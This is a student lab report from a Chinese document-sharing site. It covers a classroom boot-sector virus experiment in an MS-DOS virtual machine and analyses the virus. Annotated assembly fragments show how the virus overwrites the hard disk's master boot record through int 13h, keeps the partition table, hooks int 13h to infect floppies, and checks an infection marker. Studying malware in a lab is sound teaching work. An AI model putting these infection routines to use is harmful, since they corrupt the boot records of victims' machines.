




版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、.实验一 引导型病毒实验1. 实验目的 通过实验,了解引导区病毒的感染对象和感染特征,重点学习引导病毒的感染机制和恢复感染染毒文件的方法,提高汇编语言的使用能力。 2. 实验内容本实验需要完成的内容如下: 引导阶段病毒由软盘感染硬盘实验。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制;阅读和分析病毒的代码。 DOS运行时病毒由硬盘感染软盘的实现。通过触发病毒,观察病毒发作的现象和步骤,学习病毒的感染机制;阅读和分析病毒的代码。3. 实验环境 VMWare Workstation 5.5.3 MS-DOS 7.104. 实验步骤与结果第一步:1、 打开VMware Workstati
2、on,新建虚拟机,过程如下:然后点next,点NEXT, 硬盘大小可自行分配,大概1G左右就ok,一直到完成为止。第二步:1 安装MYDOS2 启动虚拟机电源,自动从虚拟软驱进入安装过程,一路点NEXT,AGREE到为虚拟机系统生成一块fat32的硬盘区,点击,然后reboot。3 再次进入安装引导过程,一路点NEXT,AGREE到重写MBR 选yes,而后选择安装目录C:dos71目录。在选择DOS commands only安装。并取消DOS add-on的安装复选项。然后一路点NEXT,AGREE。选择enable umb memory 在下一个页面里选择load both cd/dvd
3、 和 IDE/ATAPI 第三步:步骤如课本实验一1 运行虚拟机,检查目前虚拟硬盘是否含有病毒。2 将virus.img加入软驱,运行虚拟机:3、 删除虚拟软盘,通过硬盘引导按任意键进入DOS系统4、 通过命令format A:/q 快速格式化软盘。5、 软驱中加入empty.img引导。如下:5. 病毒代码分析 i. 传染模块主要代码及传染过程说明;inc cx;cx此时为1,为2mov ds:si+offset reg_cx,cxmov ax, 0301h;写入一个扇区mov dx, 0080h;写入硬盘1的0面int 13h;开始写入jb boot_dos;不成功转到boot_dosmo
4、v cl, 21h;准备搬移33个字mov di, 01beh;从内存高端的03beh搬移到mov si, 03beh;内存高端的01beh,此处正是病毒程序的驻留区rep movsw;开始搬移mov ax, 0301h;准备向硬盘写入一个扇区xor bx, bxinc cx;cx置1int 13h;写入物理硬盘0面0道1扇区call near ptr install;安装病毒的int 13h mov dx, 0080h;读硬盘0headint 13h;开始读取 /* 读取正常的引导扇区,以备安装 病毒的int 13h 后正常启动call near ptr install传染过程说明:先判断机
5、器从哪里启动,如是从硬盘启动,直接安装病毒到int 13h,通过int 13h 感染软盘。读取软盘0面0道1扇区到病毒常驻段偏移地址为0200h,读取成功转read_succ处理,否则软驱复位。读取操作次数减1,不为0再次读取,否则退出。读取成功后,以vir_init处一个字的机器码为特征码进行比较,判断软盘是否已经染毒,如果未染毒,则进行传染。若已染毒,则退出。若是从软盘启动,需传染硬盘。将读到的正常引导记录保存道0道2扇,写入一个扇区,再写入硬盘1的0面,写入不成功转到boot_dos,判断是否已被传染。写入成功则准备替换引导扇区,保留硬盘分区表,准备搬移33个字,从内存高端的03beh搬
6、移到内存高端的01beh,搬移后将cx置1,写入物理硬盘0面0道1扇区。 ii. 表现模块的主要代码及现象说明;waitstart:loop waitstartcall clearstr /显示空字符串,抹去刚画的笑脸符mov ax,0100hint 16hjz nextloopret;调用10h中断将字符串打印到屏幕上dispstr:mov ax, csmov es, axmov ax, offset bootmessagemov bp, ax; es:bp = 串地址mov cx, 5; cx = 串长度mov ax, 01301h; ah = 13, al = 01hmov bx, 00
7、0ch; 页号为0(bh = 0) 黑底红字(bl = 0ch,高亮)mov dh, 5mov dl, colint 10h; 10h 号中断ret;用空格清除上一次的输入clearstr:mov ax, csmov es, axmov ax, offset clearmessagemov bp, axmov cx, 5mov ax, 01301hmov bx, 000chmov dh, 5mov dl, colint 10hret现象:黑屏幕上笑脸符自左自右反复显示,有动态效果。 iii.说明该病毒触发传染的条件;病毒会将正常的引导记录存在:硬盘,0面0道2扇区。取出的地址如果不是0道2扇区
8、则系统一定是从软盘启动,此时需要传染硬盘 。如果是0道2扇区则一定从硬盘启动,直接安装 病毒到int 13h,通过int 13h 感染软盘。传染硬盘时,要先读硬盘0面0道1扇区得内容到病毒驻留区段并偏移512个字节,把读到的内容的第一个字取出与06ebh相比,判断是否已被传染。如果比较结果相等,说明硬盘先前已传染,就不再次传染,直接调用子程序,安装病毒的int 13h。不相等,说明硬盘没有被传染,跳转到传染程序。 iv. 说明病毒表现模块触发的条件。开启电脑(或虚拟机),电脑(或虚拟机)开始引导启动时,因为正常的引导的位置已变为病毒程序,所以此时立刻运行病毒。将病毒的程序码搬移到1k高地址区,
9、置搬移数量及搬移目的地址的偏移地址(段地址es先前已放置),开始搬移256个字,也就是512个字节(一个扇区)。再转到藏身区继续执行 。病毒程序将在1k的驻留地区继续执行,触发表现模块,程序即进入黑屏幕上自左至右反复显示笑脸符的主循环。6. 总结与心得本次实验过程为先建立一个虚拟机,运行虚拟机,检查虚拟硬盘是否含有病毒。然后将有毒软盘加入软驱,这时病毒寻找DOS引导区的位置,并将DOS引导区移到其它位置,将自己写入原DOS引导区的位置。病毒占据物理位置并获得控制权(在启动虚拟机时获得)。病毒引导程序运行后,病毒驻留内存,将控制权交给真正的引导区内容。虚拟机运行,发现虚拟机已经染毒。将染毒虚拟软盘删除,通过硬盘引导,病毒依然存在。用format A:/q 格式化硬盘A盘后,运行虚拟机,虚拟机依然有病毒。通过此实验,我也算认识到引导病毒的强大
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 廉洁活动展览活动方案
- 幼儿园发型日活动方案
- 庆七一健康活动方案
- 广场检阅活动策划方案
- 幼儿园绳子课程活动方案
- 幼儿园周末搞笑活动方案
- 幼儿活动种植活动方案
- 幼儿园英语问答活动方案
- 广州赛事活动策划方案
- 幼儿园迎新节活动方案
- 加强社区两委换届监督工作的实施方案
- 白云区地图广州市白云区乡镇街道地图高清矢量可填充编辑地图PPT模板
- [湖南]5万吨净水厂给排水工艺全套图纸(附170页计算说明)
- DB33T 1203-2020 建设工程施工扬尘控制技术标准
- 用药咨询与安全用药管理制度
- 外国文学名著导读
- 脑卒中患者血压管理
- 如何制作OruxMaps离线地图
- 校企汽修专业战略合作协议书
- 《红楼梦》四大家族主要人物关系图
- 地暖工程监理细则
评论
0/150
提交评论